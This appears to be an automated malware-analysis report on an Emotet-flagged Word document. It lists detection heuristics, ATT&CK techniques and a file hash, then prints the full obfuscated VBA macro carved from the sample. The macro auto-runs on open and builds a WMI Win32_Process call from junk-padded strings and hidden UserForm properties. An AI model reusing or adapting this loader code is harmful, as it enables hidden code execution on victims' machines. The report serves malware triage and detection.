Verdict: MALICIOUS
Risk Score: 232
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
- T1140 Deobfuscate or Obfuscate Malicious Code
The file contains a VBA macro that utilizes a hidden UserForm command stager, a technique commonly associated with Emotet. The macro is obfuscated and appears to be designed to download and execute a second-stage payload. ClamAV detection further supports the Emotet family attribution.
Heuristics (8)
- ClamAV: Doc.Downloader.Emotet-7464372-0 (severity: critical; rule: CLAMAV_DETECTION). ClamAV detected this file as malware: Doc.Downloader.Emotet-7464372-0.
- VBA macros detected (severity: medium; rule: OLE_VBA_MACROS; 4 related findings). Document contains VBA macro code.
- VBA UserForm hidden-property command stager (severity: critical; rule: OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER). VBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive. Matched lines in script:
    MNDUE = "32ksad_weddv"
    Yidwojlxvu = Join(Split("32ksad_weddvwi32ksad_weddvnm3" + "2ksad_weddvgm32ksad_weddvts32ksad_weddv:32ksad_weddv" + "W32ksad_weddvin32ksad_weddv332ksad_weddv2_32ksad_weddv", MNDUE), "") + Cfifdbzh.Txqcvasu + "rocess"
    Select Case Dudqtilj
- CreateObject call (severity: high; rule: OLE_VBA_CREATEOBJ). Matched lines in script:
    Next
    Set Hfiglzcehibq = VBA.CreateObject(JJKBSKJ + Yidwojlxvu)
    Select Case Yhdhwylebxxim
- VBA p-code auto-exec with execution tokens (severity: high; rule: OLE_VBA_PCODE_AUTOEXEC_EXEC). Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Document_Open macro (severity: low; rule: OLE_VBA_DOCOPEN). Matched lines in script:
    Attribute VB_Control = "Txqcvasu, 0, 0, MSForms, TextBox"
    Private Sub Document_open()
    Select Case Jirqxvrcjakzc
- Suspicious extracted artifact (severity: info; rule: EXTRACTED_FILE_STATIC_TRIAGE). One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (severity: info; rule: EMBEDDED_URL). One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (found in document text, OLE body).
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10697 bytes |

SHA-256: 46bc66e7944768f389fb49a211b7889dfddf333fea30766c468c11f7e6f20d48

Detection (macros.bas):
- ClamAV: No threats found
- Obfuscation or payload: likely. 344 of 513 identifiers look randomly generated (e.g. 'W32ksad_weddvin32ksad_weddv332ksad_weddv'), consistent with name-mangling obfuscation.

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "Cfifdbzh"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Txqcvasu, 0, 0, MSForms, TextBox"
Private Sub Document_open()
Select Case Jirqxvrcjakzc
Case Dhgzjyzqjcpm
Oyrcksll = Sin(Hhoupuixdsloy)
Aksioijycvctx = CStr(Kriksbjf)
Trjzoazlcji = 324
Knxjmzma = Sin(Yitfnmxre)
Uqaynuciuivr = CStr(Wuswgnoilkrvu)
Esdbjqwxkzeks = 567
Dqehrsfuydflf = Sin(Raqipprqf)
Whwbdvso = CStr(Rmvgzyfx)
Rheieujai = 5645
End Select
For Yarvxxxaktrjf = Vcqqmtcciod To Jlrfubslelcai
While Layyiryhkrag <> Igtjzryblodhb
Nqewirhqefg = Houvwnvej * Atn(Fvjpjvbph) * (Bvkogaqodtgtu + Iknvmeyvqnhs)
Wend
Next
Select Case Vehtpovkfitu
Case Fhtiknlvszx
Zpuuttwposwh = Sin(Heiqeqrbekhf)
Zmhwjsvvlo = CStr(Fzrowakt)
Jjtpdxkjmntm = 324
Kaygxmsu = Sin(Ksjqnhuf)
Dydtpykbb = CStr(Tjqdwcdvs)
Sqelntwftnh = 567
Lxerzbqsfvrit = Sin(Frjmingmoek)
Wstmbsszx = CStr(Rjxnunduheabd)
Kfkpnokkwmcfg = 5645
End Select
For Rhenvzqtsbbq = Vqprcimo To Hgybasixtnntx
While Ztlsomxbjavmn <> Hczfgoapsase
Nctztcobwumj = Affvtagkurk * Atn(Esrviafvybnub) * (Gfswjlpnu + Wpdhcpjdki)
Wend
Next
Select Case Xutfhjzrc
Case Fxvmwkubs
Hmzcyhinjzpn = Sin(Jdcqrdzqn)
Kpwnatild = CStr(Fekrioviq)
Engrlasuqye = 324
Rmzifgbducx = Sin(Zukvffxvl)
Jiitixhbj = CStr(Wondjilj)
Sfaxkutyxt = 567
Tywyivwv = Sin(Kzywicwojby)
Chvycocmcts = CStr(Gkzqmpmevbz)
Qcijefvhuq = 5645
End Select
For Ugubhfgatwlpt = Kmggwkpxzd To Nzglultsisc
While Snsurtqpvkvnk <> Ejuypptbnk
Zwbsjskd = Cikbarokyjuhn * Atn(Eyfzlfkaprsus) * (Aoohgmonpbmc + Jrjcteued)
Wend
Next
Xgmmntpfabj
End Sub
Attribute VB_Name = "Nvexppvwbclb"
Attribute VB_Base = "0{A6D80BC6-2311-44CA-A76A-75F767D585D2}{366FF9DB-38AE-4D4B-A864-A07D6AC66334}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Uyrkuoeaboav"
Function Wyjpoleontqe()
Select Case Pudafirtriera
Case Ethbtoflgkn
Rcdncrfu = Sin(Uvfwlerxpk)
Ncqpkjiwqrbq = CStr(Erpjovsjmgn)
Hpnywjyobxnh = 324
Ptdupuwzah = Sin(Vzepkbsqagcsf)
Adubcsjd = CStr(Myxwipfsan)
Lmloelirkp = 567
Vvfgddlvogy = Sin(Tsrxaeseqrhq)
Yvyzxpgbmjz = CStr(Cdwfoitltrtkk)
Fdypppnapg = 5645
End Select
For Osfhykhqbum = Ucfefomav To Ljahocgynv
While Njvaczjkrgiu <> Wksontwww
Zcznoemqjr = Ojallreagu * Atn(Wgzhlxrng) * (Wkwdbvde + Ademhkfr)
Wend
Next
Svoeisqwp = Cfifdbzh.Txqcvasu
Select Case Ywnwqvijnirak
Case Ixsdlntodw
Gvwqliwgnveis = Sin(Xamjybve)
Svleikaex = CStr(Qsfsokxnsjl)
Voqmnvkqqk = 324
Kbfkeeuzmh = Sin(Rjryrnvhl)
Ttnqbrxahm = CStr(Jscofrka)
Judemzcpl = 567
Smrqnshoga = Sin(Fifozppbyu)
Snxfyysbes = CStr(Lysydmhfo)
Wgldzvznyygxz = 5645
End Select
For Qiithmrz = Xqxlmhvk To Znutfefr
While Asdbvzxvb <> Ghccecbmr
Lucdnpochas = Envqnkai * Atn(Sfsqacdfptnhi) * (Lhhzdenibxrg + Hkehzjyvynzdv)
Wend
Next
Twyotyzlmuu = Svoeisqwp + Nvexppvwbclb.Kdxtincasrpzy + Nvexppvwbclb.Fhwefplfn + Nvexppvwbclb.Ejngnmrbmmuof
Select Case Rcmsldowoup
Case Fqejjmrliy
Doirgesgqe = Sin(Lbolnkoemqmf)
Apybidcjhpff = CStr(Xauaxmyixgy)
Fwmbdkkech = 324
Qqctzgibyglwm = Sin(Xrssdkswmuoc)
Lvtfehvwpyzpw = CStr(Kqpvpnnkollyt)
Lendnlsqhbzac = 567
Oogxbeygfkxk = Sin(Sibgqnvbsyns)
Uqmlqvxxs = CStr(Umxitpanxos)
Lgxmvhjjeqmp = 5645
End Select
For Ujvvqerway = Inectcsszkylb To Fqwksvdgebs
While Cpfzswyvebxk <> Nkkkufrmg
Bdfhzbaazpk = Tfmraozavqpvu * Atn(Vbqjblqtsofaw) * (Pcflrptzlremf + Lfkbfyzbdnc)
Wend
Next
Ybazpsmlhhhz = Twyotyzlmuu + Nvexppvwbclb.Kxwxljzwwv + Nvexppvwbclb.Jjxokufcbwu.Factoid
Select Case Cdvzgcgdbcvr
Case Xyhuuhukhb
Mzlaphwlln = Sin(Tsqekxotqanh)
Sfasvthyqg = CStr(Moulxjop)
Qqzknzsl = 324
Feorltsql = Sin(Jmjlzyfd)
Fkrojslfifeu = CStr(Iadzeryefzgdq)
Anihlztxcba = 567
Dqypzncyuf = Sin(Ubfshfbnqhs)
Bvpdaydkmbo = CStr(Edvpghjurynf)
Ztuwxccyrnvug = 5645
End Select
For Haqrqbxr = Knsjxbyf To Rsfqypfm
While Mbnsjywneubc <> Npjotmwoerkp
Sbvligojzzaye = Icpzkdjf * Atn(Vyxwvhudwudy) * (Mgepjovhlnwo + Kwjvesmirme)
Wend
Next
Wyjpoleontqe = Pwygysmwjcru + Ybazpsmlhhhz + Pwygysmwjcru
Select Case Lcwitdhj
Case Nlgyrrzxn
Sqgvgxjelxtsa = Sin(Ihvliyfbv)
Yxzvqreeslp = CStr(Fyexittfhlj)
Bbynpkdr = 324
Fpgbowytsv = Sin(Jthscyirl)
Pqdgewfi = CStr(Nzhbrfjjs)
Svrefwifihzom = 567
Kptxnmmzwu = Sin(Kszitzgwulb)
Xdnznkujgutpu = CStr(Gvvkffymiz)
Gvqznuyqjzz = 5645
End Select
For Fheygszwvq = Rttzreahvno To Fvwnbgvmbzyt
While Hgslfrjw <> Rrvzbortp
Wdjtjdeq = Fcbsaccixmiv * Atn(Jlvkmieelckdj) * (Oeggjlotgalol + Rblmkxhtdlq)
Wend
Next
End Function
Function Xgmmntpfabj()
Select Case Zcvyzfxy
Case Lgootoeshbduc
Nsfrcnunt = Sin(Tzysthmqjxvg)
Pzmnyfzsqlmsh = CStr(Qtuobvetoi)
Mtkrmdrno = 324
Uusajmgaatese = Sin(Aelfxfdxmzft)
Pfyitaujuug = CStr(Upiagqucn)
Kuqxfbdtg = 567
Ngjkaxqkqy = Sin(Iheyzdfmcdpxz)
Etrnbxkccqvpw = CStr(Lkuwipac)
Axhjqmkramr = 5645
End Select
For Oayfchdnia = Fcdbgdqmyazd To Elyvzlmzgv
While Yubcrwhrlj <> Tjammnbvmqd
Mbofgwirwfw = Icvbaveicpkzm * Atn(Pxhrjmevslem) * (Xeebqeyzlqhnh + Dfteocyxeb)
Wend
Next
MNDUE = "32ksad_weddv"
Yidwojlxvu = Join(Split("32ksad_weddvwi32ksad_weddvnm3" + "2ksad_weddvgm32ksad_weddvts32ksad_weddv:32ksad_weddv" + "W32ksad_weddvin32ksad_weddv332ksad_weddv2_32ksad_weddv", MNDUE), "") + Cfifdbzh.Txqcvasu + "rocess"
Select Case Dudqtilj
Case Mzvpijcqtv
Pwwovkwiib = Sin(Dekxkkgn)
Vnncqdpyr = CStr(Tfhtenanpakf)
Dzfgjouyib = 324
Susskkdk = Sin(Cdgwfawgkhvpn)
Rhbyvwgkdu = CStr(Xqachcewcamj)
Bqbfdhoj = 567
Blocwtcb = Sin(Zpkfnmiih)
Sdtupjyrzfoy = CStr(Vobzixlk)
Mgvrqyfb = 5645
End Select
For Iiuhgkekz = Rneryhiztj To Rijngbbamxp
While Tttytakoqut <> Rqxchyasczwwx
Zyuynefnpaajy = Oqxhjkdk * Atn(Rvquwbvrlor) * (Dvlchbhpbrbk + Qzowofhvjpttz)
Wend
Next
Set Hfiglzcehibq = VBA.CreateObject(JJKBSKJ + Yidwojlxvu)
Select Case Yhdhwylebxxim
Case Ufaiuzqc
Ewxcbkbfj = Sin(Hsezvbfg)
Jlcbtpgvxhe = CStr(Rcoczmvd)
Cmnwjzxkw = 324
Ulvahvujmow = Sin(Mxgzftjmgfa)
Sxwzwidlx = CStr(Bsrbuqrgfwjl)
Fcocnfumccwmm = 567
Dfpgnynbisp = Sin(Jijmebrfpijl)
Ppehdasbquf = CStr(Sbfkxradtskil)
Oxfupjxme = 5645
End Select
For Mbhspgzbye = Mtylwwtzsajmt To Pqvobzlfyv
While Eikbefzt <> Xaqkltlsvya
Kdqhyaozqv = Qhzfhtvkytu * Atn(Ortgaccjyay) * (Bslrgexuummmn + Klqisqjiv)
Wend
Next
Fhpzuxlwmaukx = Yidwojlxvu + Nvexppvwbclb.Ygxcnftfdrk.ControlTipText + Nvexppvwbclb.Gyykdkjt.ControlTipText
Select Case Kumigxelb
Case Xmpmgyjz
Mkdugown = Sin(Savlzvwq)
Rykgmjohasp = CStr(Iyjiozjiybdjx)
Nlbtkiina = 324
Xapmhovam = Sin(Miqfitxhxos)
Pqwmrzljlfci = CStr(Tonxeswztc)
Opsateqv = 567
Rjjnahacowp = Sin(Tjqnqxpw)
Qlvqlmxsx = CStr(Xeorrpyr)
Kgmzrcqzxh = 5645
End Select
For Csbfqpqqeruav = Wzhrffxf To Rujgszgizb
While Myjbxftmldm <> Apqosfmxwyvg
Rnswcghnii = Rmsxohimr * Atn(Thwjspanuot) * (Thktmnghlknae + Oxwthxyofx)
Wend
Next
Zcamqyegpjckz = Fhpzuxlwmaukx + Cfifdbzh.Txqcvasu
Select Case Nebhhwjgrpo
Case Tlnyovaatjkdu
Dmxhndeenl = Sin(Fxdrrcxik)
Zzkouvqdnx = CStr(Frhdtoha)
Pvcprtbx = 324
Ccxicokiwhyie = Sin(Zkydtcawxjple)
Cqgaactyafezd = CStr(Hqhrsict)
Bgazndfeyfibd = 567
Gmxypdxrubzdn = Sin(Zwjezwtyncy)
Zugmovlwe = CStr(Sepfyozst)
Mrzuznnkw = 5645
End Select
For Srzumpsasu = Lugnaycg To Tiomtvyitzrj
While Gdbjztrllpozs <> Ltjixxrgzwx
Aakbiihwxt = Diwyytcyv * Atn(Iboaoxbnc) * (Lkfmrktqo + Atpuhacv)
Wend
Next
Set Xgmmntpfabj = CreateObject(Zcamqyegpjckz)
Select Case Mkeoisdh
Case Ebiywags
Yovmuwzznhy = Sin(Hiltnvlsime)
Earikgew = CStr(Osumtdtgbzmbq)
Txcvpbrzq = 324
Hfwsasdkxbtjs = Sin(Fcnqckgbrjc)
Vwsdtuvojjz = CStr(Gnfaojhawomaq)
Dfixrpob = 567
Pysbvtoveet = Sin(Ustnzhfccfuk)
Bdirlxky = CStr(Zavyfmkhino)
Cotcmnsxrrtmr = 5645
End Select
For Hygvheozmh = Vmcqmwfgdsu To Trijclnrxa
While Swtophuow <> Oahpmojpeh
Nfqkwjzymsj = Lsnlzjowftjvv * Atn(Okezhigi) * (Yfxyzvqnpbwve + Vrhmhpbhxkboj)
Wend
Next
Xgmmntpfabj.XSize = False
Select Case Dzaqiwcty
Case Rxjjznnirydbp
Feszrdghtgdqh = Sin(Wmejmvcgw)
Ohizylmkrxaz = CStr(Kqqcvwfukbqw)
Dcyvexpyztis = 324
Wjwnvqbfmebyo = Sin(Gjcfugozeuldm)
Ucsiyafdapqyq = CStr(Gjvatkfmjqhk)
Jmoopjyfgvwa = 567
Qeiyfkoc = Sin(Wmppjrqqnl)
Bjakvadz = CStr(Edwfijehdhdc)
Ujwofgmu = 5645
End Select
For Dyyvooyjidh = Dihmghjyyrwp To Ouxgjsic
While Jtoiuunwip <> Xtgmbpegb
Kkpkxxtk = Wcmsbddeahwli * Atn(Zwrtxcje) * (Yfkqyoerg + Tuzlbcayeyb)
Wend
Next
Xgmmntpfabj.YSize = False
Select Case Okkazawojaab
Case Mkapxqbst
Iyhrakbqntmtr = Sin(Jwfvdezag)
Rzduwrpbrcpw = CStr(Zlqmzrihqhe)
Quixbwgsbmtxv = 324
Retzvfetiog = Sin(Kjwpjtygif)
Dxxyxpen = CStr(Lnersmbaius)
Spdncfkiy = 567
Shhulycqsuxik = Sin(Meiwthhq)
Tbbiihmify = CStr(Hokscdnvh)
Ctfablrlrclrw = 5645
End Select
For Kmkzftohw = Bedcjbafzo To Lxnmubwxn
While Takhncnljgpk <> Otjqqathf
Sgtfavyi = Cyundlctav * Atn(Eghnhxrb) * (Lfvvugilqbdy + Odmoqofdorbn)
Wend
Next
Do While Hfiglzcehibq.Create(UJNDB & Wyjpoleontqe, Hsqlwgckyi, Xgmmntpfabj, Dbsewlml)
Loop
Select Case Frszjoiyo
Case Lxxxyncay
Eqxhbtpdgo = Sin(Ifjswjfqwr)
Tddhcbzto = CStr(Cbbnojlqtr)
Spvgqsaqnjq = 324
Qhafoaxpsgquw = Sin(Lbmpholrg)
Aobzskmqxb = CStr(Frnzziemub)
Lxbhifquj = 567
Jnsoghftfaqgx = Sin(Liciozuwoui)
Slqbzrelh = CStr(Eoioevqdmsuhr)
Apreuxbxatko = 5645
End Select
For Pddoeezrf = Dfspydyairpu To Acrhuugjxxpqt
While Rjjzlrsjhcqlo <> Aibpebijlxm
Vahkmdqif = Ihtjeeirkjw * Atn(Diujzyczwln) * (Fzkiguokgwiy + Oujyztsgd)
Wend
Next
End Function